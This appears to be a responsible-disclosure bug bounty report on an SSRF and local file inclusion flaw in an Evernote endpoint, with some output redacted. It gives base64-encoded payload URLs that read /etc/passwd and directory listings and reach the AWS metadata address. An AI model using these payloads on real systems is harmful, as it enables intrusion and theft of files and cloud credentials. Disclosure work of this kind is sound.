Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion

## Summary: The following endpoint was found to be vulnerable to SSRF : `https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jdGVzdC5qcw==/-1430533899.js` The endpoint take a path in url and retrieve its content. it is supposed to be use on path but it can be used on URL to get access to internal network :SSRF And It can also be used with file uri : Local file inclusion. ## Steps To Reproduce: ### Leak Local file: * Open the following url : https://www.evernote.com/ro/ZmlsZTovLy9ob21lL2FiZW5hdmlkZXMvIy5qcw==/-1430533899.js The payload is base64 encoded of : `file:///home/abenavides/#.js` the # is used because the end of the url must be in javascript but to ignore it in uri i made it after the # it leaks the content of the directory : ███ you can also leak file with : https://www.evernote.com/ro/ZmlsZTovLy9ldGMvcGFzc3dkIy5qcw==/-1430533899.js ███████ ### SSRF : You can also use url to trigger SSRF : * To have access to aws metadata you can use the following url : https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jLmpz/-1430533899.js █████ ## Impact The impact is critical. An attacker can leak abitrary file in the webserver of www.evernote.com And access any internal host of evernote, including awsmetadata with full response read. I didn't tried to escalate the bug to not "cross the line", and because I think it clearly demonstrate the critical impact already. Best regards.